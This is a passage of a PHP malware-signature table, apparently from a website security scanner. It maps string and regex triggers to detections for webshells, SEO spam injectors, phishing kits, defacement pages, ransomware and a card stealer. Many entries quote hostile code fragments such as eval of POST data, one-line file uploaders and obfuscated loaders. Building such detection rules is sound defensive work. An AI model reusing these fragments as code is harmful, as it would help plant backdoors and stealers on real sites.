	'=====|SPYUS|=====' => array(STR_CLEARFILE, 'html.phishing.generic.036', NULL,1),
	'@OPGviagra' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.pharma-site.002', '<!-- @OPGviagra -->[\\s]*<a href=[^@]+a>[\\s]*<!-- @OPGviagra -->'),
	'base href="http://lp.kingtranslate.com' => array(STR_CLEARFILE, 'html.dropper.kingtranslate.001', NULL),
	'$codevyp=true;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.068', 'if[\s]*\(!@\$codevyp\)[\s]*\{if[\s]*\(preg_match\([^\$]+\$_SERVER[^}]+;}[\s]*@\$codevyp=true;[\s]*\}'),
	'<a href="http://www.japanfemdom.org' => array(STR_CLEARLINE, 'html.spam-seo.spam-links.011', '<a href="http://www.japanfemdom.org" style="position:absolute; left:-5391px; top:0">japanfemdom</a>'),
	'<title>ブランドコピ' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.009', NULL),
	'<p class="dnn">By ' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.dnn-link.001', '<p class="dnn">By [^<]*<a href[^>]+>[^<]+<\/a><\/p>'),
),

'));$' => array(STR_TRIGGER,

	'(\'\',' => array(STR_TRIGGER,

		',array(\'\',\'}\'.$' => array(STR_TRIGGER,
			'<\?php[\s]*\$[\w]+[\s]*=[\s]*"[^"]+";[^(]*function [\w]+\(\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\)[\s]*\{[\s]*return[^;]+\'\'[^;]+;[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*[\w]+\(\$[\w]+[^\n]+array\(..,.\}.\.\$[\w]+\..\/\/.\)\);[\s]*(\?>)?' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.webshell.197', '<\?php[\s]*\$[\w]+[\s]*=[\s]*"[^"]+";[^(]*function [\w]+\(\$[\w]+,[\s]*\$[\w]+,[\s]*\$[\w]+\)[\s]*\{[\s]*return[^;]+\'\'[^;]+;[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*[\w]+\(\$[\w]+[^\n]+array\(..,.\}.\.\$[\w]+\..\/\/.\)\);[\s]*(\?>)?'),
			'($fu, $ck, $you){return' => array(STR_CLEARFILE, 'php.backdoor.filesman.133', NULL),
		),

		'=[\s]*[\'gzinflate\.\s]{14,};' => array(REX_TRIGGER,
			'function [\w]+\(\$[\w]+\)[\s]*\{[\s]*(\$[\w]+[\s]*=[\s]*\'[\'\.gzinflatebs64_dco\s]{14,};[\s]*){2,}\$[\w]+[\s]*=[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\)\);[\s]*return' => array(REX_CLEARFILE, 'php.backdoor.webshell.148', NULL),
		),

		'chr(ord($' => array(STR_TRIGGER,
			'if\(!function_exists\("([\w]+)"\)\)[\s]*\{[\s]*function \1\(\$[\w]+\)\{\$[\w]+[\s]*=[\s]*array[^\}]+\}[\s]*return[\s]*\$[\w]+\[[\d]+\];\}[\s]*\$[\w]+[\s]*=[\s]*"[^}]{5000}' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.025', 'if\(!function_exists\("([\w]+)"\)\)[\s]*\{[\s]*function \1\(\$[\w]+\)\{\$[\w]+[\s]*=[\s]*array[^\}]+\}[\s]*return[\s]*\$[\w]+\[[\d]+\];\}[\s]*\$[\w]+[\s]*=[\s]*"[^}]{5000}[^;]+";[^\}]+\$[\w]+\(\'\',[\s]*\$[\w]+\(\$[\w]+\)\);[\s]*\$[\w]+\(\);[\s]*\}'),
		),
		
		'gFYfxUK4iGRtEpCkuhzFqGQaUALI6ugVwCTk' => array(STR_CLEARFILE, 'php.backdoor.filesman.101.03', NULL),
		'./*;*/' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.312', '(?:<.php \$\w+=.UEQ\w+.\s*\.\/\*\s*;[^\$]+;\s*(\$\w+)=.b[^;]+\(\(\d[^;]+e.;\s*\$\w+=[^;]+;\s*\$\w+=[^;]+;\s*\$\w+=\1\(\1\([^<>]+>[\'"][^<>]+<.\s*\.\s*[\'"]\?php[^\(>]+\(\);\s*\?>)+'),

		'<?php $code=' => array(STR_TRIGGER,
			'uJgDGKH8hbymrkIGJSJwZLlFxtifEoSBFgSc5VolJWBordrdVSMpiFjwwB4BNna4gF9zml7g' => array(STR_CLEARFILE,'php.backdoor.4ngel.001', NULL),
		),
	),

	'array(' => array(STR_TRIGGER,

		'while($GLOBALS[pack($GLOBALS[' => array(STR_TRIGGER,
			'))get_contents($file,true);' => array(STR_CLEARFILE, 'php.malware.obfuscated.056', NULL),
		),

		'0x3f;$' => array(STR_TRIGGER,
			'\)\);return[\s]*\$[\w]+;\}\}else\{function[\s]*[\w]+\(\$[\w]+\)\{global[\s]*\$[\w]+;return[\s]*\$[\w]+\(\$[\w]+\);\}\}\$' => array(REX_CLEARFILE, 'php.malware.obfuscated.057', NULL),
		),

		'7q2Ubx1ep0TXWGwBWaQG1E' => array(STR_CLEARFILE, 'php.malware.generic.093', NULL),
	),

	'=$$' => array(STR_TRIGGER,
		'])];}if($' => array(STR_TRIGGER,
			'\$[\w]{20,}="(\\\\x5f|_)(\\\\x50|P)(\\\\x4f|O)(\\\\x53|S)(\\\\x54|T)";\$[\w]{20,}=\$\$[\w]{20,};if[^>]+@\$[\w]{20,}\(\);}}}' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval_POST.085', '\$[\w]{20,}="(\\\\x5f|_)(\\\\x50|P)(\\\\x4f|O)(\\\\x53|S)(\\\\x54|T)";\$[\w]{20,}=\$\$[\w]{20,};if[^>]+@\$[\w]{20,}\(\);}}}'),
		),
	),

	'(\'::r\');' => array(STR_TRIGGER,
		'\'.#' => array(STR_CLEARFILE, 'php.backdoor.str_rot13.004', NULL),
	),

	'explode(chr((435-315)),substr($' => array(STR_TRIGGER,
		',(30913-24987),(166-132)));' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.explode_chr.001', '\$\w+?\s*?=\s*?\'[^\']+?\';\s*?\$\w+?\s*?=\s*?explode\(chr\(\(435-315\)\),substr\(\$\w+?,\(30913-24987\),\(166-132\)\)\);\s*?(\$\w+?)\s*?=[^\.]+?\.=\s*?substr[^"]+?"",[^;]+?;\s*?\1=(\$\w+?);\s*?(\$\w+?)\(""\);\s*?\3=\(635-514\);\s*?\2=\3-1;'),
	),

	'];function co(){return \'Code\';}function gafu' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.032', '<script>.function.\\$\\$\\)\\{[\\w]+=\\[([\\d]+,){30}[^>]+map,mapper[^>]+<.script>'),
	'/*~:Fh3&qvgti;Lc5)jMzJS*/$qblmhCz=' => array(STR_CLEARFILE, 'php.spam-seo.generic.036', NULL),
	'$prefix = $var(\'\',$types($set_prefix));$prefix();' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.080', NULL),
	'<\?php\s*\$\w+\s*=\s*[\'"][^;]+;\s*(\$\w+\s*=\s*\$\w+\[\d+\]\s*\.\s*\$\w+\[\d+\]\s*\.[^;]+;){2,}\$\w+\(\d+\)\s*;\s*\$\w+\s*=\s*\$\w+\([\'"]{2}\s*,\s*\$\w+\(\$\w+\([\'"][^\)]+[\)\s]+\s*;\s*\$\w+\(\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.087', '\$\w+\s*=\s*[\'"][^;]+;\s*(\$\w+\s*=\s*\$\w+\[\d+\]\s*\.\s*\$\w+\[\d+\]\s*\.[^;]+;){2,}\$\w+\(\d+\)\s*;\s*\$\w+\s*=\s*\$\w+\([\'"]{2}\s*,\s*\$\w+\(\$\w+\([\'"][^\)]+[\)\s]+\s*;\s*\$\w+\(\)\s*;'),
	'<\?php\s*(\$[\w]+\s*=\s*\'[^\']+\'\s*\^\s*\'[^\']+\';){2,}\$\w+\s*=\s*\$\w+\(\'\',\s*\$\w+\(\$\w+\(\'[^\']+\'\s*\^\s*\'[^\']+\'[\s)]+;\s*\$\w+\(\)\s*;' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.087.02', '(\$[\w]+\s*=\s*\'[^\']+\'\s*\^\s*\'[^\']+\';){2,}\$\w+\s*=\s*\$\w+\(\'\',\s*\$\w+\(\$\w+\(\'[^\']+\'\s*\^\s*\'[^\']+\'[\s)]+;\s*\$\w+\(\)\s*;'),
),

'Deface' => array(STR_TRIGGER,
	'Mass Deface' => array(STR_CLEARFILE, 'php.defaced.script.002', NULL),
	'>:: MonstersDefacers Team ::' => array(STR_CLEARFILE, 'html.defaced.MonstersDefacers.001', NULL),
	'content="Malaysia Defacer' => array(STR_CLEARFILE, 'html.defaced.Malaysia_Defacer.001', NULL),
	'Gtz : BEC  - Defacer killers - Bonde Dos killers' => array(STR_CLEARFILE, 'html.defaced.DkBrazil.001', NULL),
	'<script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/' => array(STR_CLEARFILE, 'html.defaced.persiangig.001', NULL),
	'massdefacedir' => array(STR_CLEARFILE, 'php.defaced.script.008', NULL),
	'name=\'execmassdeface' => array(STR_CLEARFILE, 'php.defaced.script.008.002', NULL),
	'AUTOMATIC JOOMLA DEFACER' => array(STR_CLEARFILE, 'php.defaced.script.004', NULL),
	'$text=file_get_contents($base_url.\'/sym/root/var/named/\');' => array(STR_CLEARFILE, 'php.defaced.script.005', NULL),
	'<h1>PwnEd by : ' => array(STR_CLEARFILE, 'html.defaced.generic.072', NULL),
	'Wordpress MassDeface-->' => array(STR_CLEARFILE,'php.defaced.script.010', NULL),
	'>Tum Symlink Listesi' => array(STR_CLEARFILE,'php.defaced.script.010.02', NULL),
	'>~~./Mass Deface 2~~<' => array(STR_CLEARFILE,'php.hacktool.massdeface.002', NULL),
	'$data_to_post[\'poc\'] = \'SQL Injection' => array(STR_CLEARFILE, 'php.defaced.script.011', NULL),
	'Edited By KingDefacer' => array(STR_CLEARFILE, 'html.defaced.generic.130', NULL),
	'Defaced by BILGEKULTIGIN</H1>' => array(STR_CLEARFILE, 'html.defaced.generic.116', NULL),
),

'*/' => array(STR_TRIGGER,

	'\^[\'"]' => array(REX_TRIGGER,

		'\'^\'' => array(STR_TRIGGER,
			'<<' => array(STR_TRIGGER,
				';[\s]*[\w]+;' => array(REX_TRIGGER,
					'\'\^\'[^;]+\';[\s]*\$[\w]+[\s]*=[\s]*\'[^\x02]+;[\w]+;[^\x02]+\/\*' => array(REX_CLEARFILE, 'php.malware.obfuscated.027', NULL),
				),
			),
		),

		'(?s)^<.php.\$\w\w+=\'.{77}\'\.' => array(REX_CLEARFILE, 'rex.backdoor.chaos.001', NULL),
		'\$[\w]+[\s]*=[\s]*\'[^\n]{20,}[\s]*\'\.[^\']+([\s]{2,}\'[^\n]+\'\.){7,}' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor_obfuscated.002.02', '\$[\w]+[\s]*=[\s]*\'[^\n]{20,}[\s]*\'\.[^\']+([\s]{2,}\'[^\n]+\'\.){7,}[\s]*\'[^\n]+\';([\s]*\?>)?'),
		'\$[\w]+\^\/\*[^\x02]{4000}[^\x02]+\.\/\*' => array(REX_CLEARFILE, 'rex.backdoor.eval.007', NULL),
		'(\$[\w]+)[\s]*=[\s]*\'[^\']+\'[\s]*\^[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*\1\(\'\',' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.043', '(\$[\w]+)[\s]*=[\s]*\'[^\']+\'[\s]*\^[\s]*\'[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*\1\(\'\',[\s]*\'[^\']+\'[\s]*\^[\s]*\'[^\']+\'\);[\s]*\$[\w]+\(\);'),
		'[\w][\s]*\^[\s]*\$[\w]+;[\s]*\'' => array(REX_CLEARFILE, 'php.malware.xor_data.002', NULL),
	),

	'^' => array(STR_TRIGGER,
		'\$[\w]+=[^\n]+\'\.([\s]+\'[^\n]+\'\.\n)+[\s]+\'[^\n]+\';[\s]*\Z' => array(REX_CLEARFILE, 'php.malware.obfuscated.031', NULL),
		';$_o="\160\141\143\153";$_o0=~$_o(' => array(STR_CLEARFILE, 'php.backdoor.pack.001', NULL),
	),

	'\'noitcnuf_etaerc\'' => array(STR_TRIGGER,
		'\'//\'' => array(STR_TRIGGER,
			'(/*' => array(STR_TRIGGER,
				'*/)' => array(STR_CLEARFILE, 'php.backdoor.webshell.212', NULL),
			),
		),
	),

	'@$_=' => array(STR_TRIGGER,
		'@\$_=.[\w]*.[^\$]+\@\$_=[^\$]+\$_.[^]]+\]\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.assert.015', '(@\$_=[^;]+\.[^;]+;[\s]*)+@\$_[^;]+\);'),
	),

	'//@null "\x' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.037', '\/\*(\w+)\*\/\s*\/\/@null\s*["\'][^_]+_.x388.x653.x34a.x2ei.x63o["\'];\s*\/\*\1\*\/'),
	'\*\*[\s]*SORRYIMPOOR' => array(REX_CLEAR_MULTIMATCH, 'php.malware.cryptominer.005.02', 'SORRYIMPOOR[\s][^\*]+IHAVENOJOB'),
	'l33bo_phishers' => array(REX_CLEARFILE, 'php.hacktool.phishbackend.004', NULL),
	'Coded By x-Phisher' =>array(STR_CLEARFILE, 'php.phishing.mailer.124', 'NULL'),
	'cxh}i?AE&wyMFq(D5ZJLgTR.2vOd1GWprt4,Xm/z~3I_K`P!860[a' => array(STR_CLEARFILE,'php.backdoor.filesman.002.07', NULL),
	'BY XBALTI' => array(STR_CLEARFILE, 'php.phishing.script.036', NULL),
),

'ob_start' => array(STR_TRIGGER,

	'@$vercode=\'\';' => array(STR_TRIGGER,
		'echo("[err]invalid vercode[/err]");' => array(STR_TRIGGER,
			'$_POST[\'user_ID\']=$etuser->ID;' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.003.02', NULL),
			'if ( !$datas = $wpdb->get_row("SELECT * FROM $wpdb->posts' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.003.03', NULL),
		),
	),

	'/*edition:' => array(STR_CHAIN_TRIGGER,
		'\/\*edition[\s]*:[\s]*[\d]+\.[\d]+[\s]*\*\/[\s]*\$[\w]{8,}[\s]*=[\s]*[\'"][^\n]{100}' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_VI.001', '\/\*[\s]*edition[\s]*:[\s]*[\d]+\.[\d]+[\s]*\*\/[\s]*\$[\w]{8,}[\s]*=[\s]*[\'"][^\x02]+[\'"];[\s]*(extract[^<]+\$\w\(\);|eval[^;]+\);)?'),
		'ob_start(); // Start buffering' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_VI.001.02', 'ob_start\(\); \/\/[\s]*Start buffering[\s]*(if \(!defined\(.VI_CURRENT_FILE.\)\)[^}]+\}[\s]*)?'),
	),

	'echo "<br />httpCode:".$httpCode;' => array(STR_TRIGGER,
		'echo $html;' => array(STR_CLEARFILE, 'php.spam-seo.injector.136', NULL),
	),

	'array_reverse(array(' => array(STR_TRIGGER,
		'ob_start\(\);[\s]*[\w]+\(\);[\s]*\$[\w]+[\s]*=[\s]*ob_get_clean\(\);[\s]*\$[\w]+[\s]*=[\s]*gzinflate\(\$[\w]+\);[\s]*\$[\w]+[\s]*=[\s]*implode\(..,[\s]*array_reverse\(array\([^;]+\)\)\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(..,[\s]*\$[\w]+\);' => array(REX_CLEARFILE, 'php.malware.create_function.017', NULL),
	),

	'define(\'DZR\', base64_decode' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.038', 'define..DZR., base64_decode[^<>]+?ob_start..callbck..;[^<>]+?replace..h.+?\$buff_obs\)\); \}'),
	'YToxOntzOjQ6ImRhdGEiO3M6Mzg6Imh0dHA6Ly93d3cuZGVjb21hbmRhdC' => array(STR_CLEARFILE, 'php.spam-seo.fake-speedupcache.001', NULL),
	'} ob_start(\'_php_cache_speedup_func_optimizer_\');' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.097', '.\\*\\*[\\s]*\\* Speedup php function cache by optimizing buffer output[\\s]*\\*.[\\s]*;if ..function_exists.._php_cache_speedup_func_optimizer_... . function _php.*ob_start.._php_cache_speedup_func_optimizer_..;[\\s]*register_shutdown_function..ob_end_flush..; }'),
	'function __google_analytics_obh ($c){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.015', '<.php\s+\/\/\s+[0-9,a-z]{32}[^;]+base64_decode[^>]+TMPDIR[^>]+<.p>[^\@]+.ob_start[^>]+>'),
	'ob_start_flush' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.023', 'global\s*\$ob_starting;[^;]+if...ob_starting[^;]+function\s*ob_start_flush[^>]+tr = array[^<]+ob_htm[^;]+chr..tc..tval[^@]+ob_starting[^>]+ob_start..ob_start_flush[^>]+\}'),
	'; $output = ob_get_clean(); $fp = fopen(\'./error_log\', \'a\'); fwrite($fp,' => array(STR_CLEAR_LINEMATCH, 'php.malware.varlog.001', 'error_reporting\(0\);\s*?ob_start\(\);\s*?var_dump\([^;]+?;\s*?\$output = ob_get_clean\(\); \$fp = fopen\(..\/error_log., .a.\); fwrite\(\$fp,[^;]+?;\s*?(?:fclose\([^;]+?;\s*?)ob_end_clean\(\);'),
	'return substr_replace($content, "\n" . $script . "\n" . $tag, $tag_pos, strlen($tag));' => array(STR_CLEARFILE, 'php.spam-seo.injector.146', NULL),
	'=gzinflate(ob_get_contents());ob_end_clean();eval($' => array(STR_CLEARFILE, 'php.backdoor.uploader.406', NULL),
),

'gent' => array(STR_TRIGGER,

	'-NO-WAY-' => array(STR_TRIGGER,
		'\$user_agent_to_filter,[\s]*[\'"]-NO-WAY-[\'"],[\s]*@?\$_SERVER\[[\'"]HTTP_USER_AGENT[\'"]\]' => array(REX_TRIGGER, //order matters! Consult modification of this group with PG
	
			'-NO-' => array(STR_TRIGGER,
				'$adm_url' => array(STR_CLEARFILE, 'php.spam-seo.injector.153.02', NULL), 
				'@file_get_contents(PATH777 . \'base\')));' => array(STR_CLEARFILE, 'php.spam-seo.injector.153.04', NULL), 
				'-NO-WAY-[^{]+\{[\s]*\}[\s]*\{' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.153.07', 'if[\s]*\([\s]*!empty\([^;]+?-NO-WAY-[^{]+\{[\s]*\}[\s]*\{[^}]+\}[\s]*\{[\s]*\}'),
				'-NO-WAY-\',@$_SERVER[\'HTTP_USER_AGENT\']);if(strpos($str,\'-NO-WAY-' => array(STR_CLEARFILE, 'php.spam-seo.injector.153.08', NULL),
			),

			'<\?php[\s]*(\$is_bot[^;]+;[\s]*)?\$user_agent_to_filter' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.153', '<\?php[\s]*(\$is_bot[^;]+;[\s]*)?\$user_agent_to_filter[\s]*=[\s]*array\([^;]+;[^\x02]+?\?>'),
		),
	),

	'echo "$content";' => array(STR_TRIGGER,
		'function gethttpcnt($url,$timeout =' => array(STR_CLEARFILE, 'php.spam-seo.injector.156', NULL),
	),

	'User-Agent: SEoDOR-Client (' => array(STR_CLEARFILE, 'php.spam-seo.SEoDOR.001', NULL),
	'"http://lily666.com' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.004', '<script type="text.javascript">[\\s]*if[\\s]*.navigator.userAgent.match[^{]+{[\\s]*(?:(?:window.location = "http:..)|(?:location.replace."http:..))lily666.com[^;]+;[\\s]*}*[\\s]*<.script>'),
	'"userAgent","test","substr","location"];function setCookie(_0x' => array(STR_CLEARFILE, 'js.spam-seo.redirect.011', NULL),
	'if (navigator.userAgent.match(/msie/i) || navigator.userAgent.match(/opera/i)) { document.write(\' <div styl' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.002', 'if\s*.navigator.userAgent.[^;]+document.write[^>]+div[^<]+<iframe\s*src[^;]+iframe><.div>..;\s*\}'),
	'").$user_agent_en.line_output("' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.005', NULL),
	'|^your.*|^zeto.*|^ZTE.*/i\', $useragent)) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.032', '\\$useragent=\\$_SERVER..HTTP_USER_AGENT..;[\\s]*if.preg_match[^,]+, \\$useragent...\\{[\\s]*header[^;]+;[\\s]*}'),
	'return whatever.list[n].split("").reverse().join("");' => array(STR_CLEARFILE, 'js.spam-seo.redirect.039', NULL),
),

'$f' => array(STR_TRIGGER,

	'eval(' => array(STR_TRIGGER,
		': | :\'));' => array(STR_TRIGGER,
			'.=chr(ord($' => array(STR_TRIGGER,
				'!Ak&' => array(STR_CLEARFILE, 'php.spam-seo.injector.216', NULL),
			),
		),
	),

	'mkdir(\'' => array(STR_TRIGGER,
		'\', 0777);' => array(STR_TRIGGER,
			'.html\', w); fwrite($' => array(STR_TRIGGER,
				'><script>parent.location.href=\'http:' => array(STR_CLEARFILE, 'php.spam-seo.injector.213', NULL),
			),
		),
	),

	'$file_url .= \'?n=\' . $_SERVER[\'QUERY_STRING\'];' => array(STR_TRIGGER,
		'$file = file_get_contents($file_url);' => array(STR_TRIGGER,
			'echo $file;' => array(STR_CLEARFILE, 'php.spam-seo.injector.104',NULL),
		),
	),

	'$currUrl = $ancienCont.$currUrl;' => array(STR_TRIGGER,
		'function curPageURL()' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.170', 'function curPageURL\\(\\)[\\s]*\\{[\\s]*\\$pageURL[\\s]*=[\\s]*.http[^>]+\\$currUrl[\\s]=[^}]+fwrite\\(\\$[\\w]*,[\\s]*\\$currUrl\\);[^}]+echo fgets\\(\\$[\\w]\\);[\\s]*fclose\\(\\$[\\w]\\);'),
	),

	'$f[1]="' => array(STR_TRIGGER,
		';$z[1]="' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.053', NULL),
	),

	'$file = \'laba.txt\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.054', NULL),
	'$shit = @fgets($flog,' => array(STR_CLEARFILE, 'php.spam-seo.injector.066', NULL),
	'echo \'Path: \' .  $f . \'<br />\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.238', NULL),
	'$folders =  search_dir( "wp-content/themes", true' => array(STR_CLEARFILE, 'php.spam-seo.injector.070', NULL),
	'@file_put_contents($file,"$p::$tvd\n",FILE_APPEND);' => array(STR_CLEARFILE, 'php.spam-seo.injector.017', NULL),
	'$file_new_data = $sape_start_marker.$code_inject_sape.$sape_end_marker.$file_new_data;' => array(STR_CLEARFILE, 'php.spam-seo.infector.004', NULL),
	'fwrite($fp, \'<?php header("Location: \'.$urlz.\'"); ?>\');' => array(STR_CLEARFILE, 'php.redirect.header_location.024', NULL),
	'$f=$_FILES[x];copy($f[tmp_name],$f[name]);' => array(STR_CLEARFILE, 'php.backdoor.uploader.043', NULL),
),

'="http://' => array(STR_TRIGGER,

	'<div' => array(STR_TRIGGER,

		'google\') !== false || strpos' => array(STR_TRIGGER,
			'</a> &nbsp;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.005', '\$\w+\s*=\s*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);\s*if\s*\(strpos\s*\(\$\w+\s*,\s*.google.\s*\)\s*!==\s*false\s*\|\|\s*strpos\s*[^\{]+\{[^&]+&nbsp;[^\}]+\}(\s*\$\w+\s*=\s*array\(\);[^\']+\'.\s*\!==\s*\$\w+[^\[]+\[\][^\[]+\[\][^\.]+\.php.;[^;]+;\s*\})?'),
		),

		'path/to/your/api.php" onkeyup="getApilistLength()"' => array(STR_TRIGGER,
			'valid account">VALID' => array(STR_CLEARFILE, 'php.hacktool.paypal_validator.001.02', NULL),
		),

		'<div class=\'headingTXT\'>citibank Online TT(CURRENCY : US DOLLARS)</div></TD>' => array(STR_CLEARFILE, 'html.phishing.citibank.001', NULL),
		'<div id="fb-root"><marquee' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.fbmarquee.001', '<marquee\s*((height|width|scrollamount|scrolldelay)\s*=\s*\d+\s?)+>[^>]+(<a href=.http\H+\s*title=.(\d+|\w+|\s+)+.>(\d+|\w+|\s+)+<.a>\n)+[^>]+<.marquee>'),
		'<div class="_all_wplink' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.161.02', '[\'"]\s*<div\s*class\s*=\s*[\'"]_?all_wplink(?:\w+)[\'"]\s*style\s*=\s*[\'"]height:-?\dpx\s*;\s*overflow:hidden\s*;\s*[\'"]>[^\2]+<\/div>\s*[\'"]\s*;'),
		'if ($_SERVER[\'REQUEST_URI\']==\'/\'){?><div style="position:' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.pornspam.008', 'if[\s]*\(\$_SERVER\[.REQUEST_URI.\]==.\/.\)\{\?><div[^\}]+text-decoration:none;.[\s]*href=.http[^\?]+<\/a><\/div><\?php[\s]*\}'),
	),

	'<?php echo \'<a href="http://' => array(STR_TRIGGER,
		'</a>\';?>' => array(STR_TRIGGER,
			'viagra' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.link_injector.003', '<\?php echo .<a href="http:..[^>]+>[^<]+?(viagra|cialis|pharm)[^<]+?<.a>.;\?>'),
		),
	),

	'<IFRAME SRC="http://glendaleoffice.com/' => array(STR_CLEAR_LINEMATCH, 'html.malware.iframe_glendaleoffice.001', '<IFRAME SRC="http:..glendaleoffice.com.[^>]+>'),
	'<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>FREE PORN' => array(STR_CLEARFILE, 'php.spam-seo.pornspam.003', NULL),
	'<u><b>Fucked By C0der' => array(STR_CLEARFILE, 'html.defaced.c0der.002', NULL),
	'<input type="file" name="files[]" /><button>ndsxf~/</boutton>' => array(STR_CLEARFILE, 'php.malware.generic.058', NULL),
	'src="http://www.hcifx.com/' => array(STR_CLEAR_LINEMATCH, 'html.injected.hcifx.001', '<script[^>]+?src="http:\/\/www\.hcifx\.com\/[^>]+?>\s*?<\/script>'),
	'>Pisher Black Plugin' => array(STR_CLEARFILE, 'php.phishing.generic.034', NULL),
),

'decrypt' => array(STR_TRIGGER,

	'dectest' => array(STR_TRIGGER,
		'elseif (isset($_POST["dectest"]) && secret_ok())' => array(STR_STOP, 'php.hacktool.ransomware_ctb_locker.001', NULL, 1),
		'$allenc = file_exists(\'allenc.txt\')' => array(STR_STOP, 'php.hacktool.ransomware_ctb_locker.002', NULL, 1),
	),

	'echo \'~mail|\'.$row[\'email\']."|".$row[\'value\']."<br/>\n";' => array(STR_TRIGGER,
		'echo "<b>Number of cc quote payment:</b> ".strval($count[0])."<br/>\n";' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.042', NULL),
	),
	
	'_doCryptBlock\':function(_0' => array(STR_TRIGGER,
		'./cipher-core\':0x3,\'./core\':0x4,\'./enc-base64' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.030', 'var[\s]*_0x[\w]+=\[(\'[^\']+\',){1000}[^;]+\];[\s]*\(function\(_0x[\w]+,[\s]*_0x[^\n]+\{\},\[0x[\d]+\]\);'),
	),

	'eval(xxtea_decrypt(base64_decode($string' => array(STR_CLEARFILE, 'php.backdoor.filesman.005', NULL),
	'eval($dec);' => array(STR_CLEARFILE, 'php.backdoor.decryptS0.001', NULL),
	'"])){eval(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.007', NULL),
	'Created by l33bo_phishers' => array(STR_CLEARFILE, 'php.phishing.generic.009', NULL),
	'$ch = curl_init($this->getEncryptedKey() . "?d=" . $domain);' => array(STR_CLEARFILE, 'php.hacktool.ransomware.005', NULL),
	'add_filter(\'content_save_pre\', \'wpe_encrypt_before_save' => array(STR_CLEARFILE, 'php.hacktool.ransomware.005.02', NULL),
	'Visit spKINGS' => array(STR_CLEARFILE, 'js.phishing.generic.013', NULL),
	'$clear_text = openssl_decrypt($encrypt_text, "DES-EDE3", $key, OPENSSL_RAW_DATA, "");' => array(STR_CLEARFILE, 'php.hacktool.backend.001.02', NULL),
	'function generate_click_id($result) {$p = microtime();' => array(STR_CLEARFILE, 'php.spam-seo.generic.048', NULL),
	'$virus = openssl_decrypt(base64_decode($output),' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.090', '\$output[\s]*=[\s]*[^;]+;[^\(]+\$virus[\s]*=[\s]*openssl[^;]+\);[\s]*([\w]+\(\$virus\);[\s]*)+'),
	'$data = @openssl_encrypt($data, "AES-256-CBC", base64_decode($key), 0, substr(base64_decode($key),' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.375', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_REQUEST\[[^\]]+\][\s\)]+\{[\s]*(@ini_set[^;]+\);[\s]*)+function [\w]+\(\)[\s]*\{[\s]*define[^@]+@openssl_encrypt[^\*]+echo _out[^;]+\);[\s]*exit;[\s]*\}[\s]*[\w]+\(\);[\s]*\}'),
),

'b374k' => array(STR_TRIGGER,
	'b374k (login' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.001', NULL),
	');@$b374k("' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.003', NULL),
	'http://code.google.com/p/b374k-shell' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.004', NULL),
	'author: b374k' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.005', NULL),
	'(md5($_POST[\'pass\']));' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.006', NULL),
	'<title>b374k 2.' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.007', NULL),
	'$GLOBALS[\'title\'] = "b374k";' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.011', NULL),
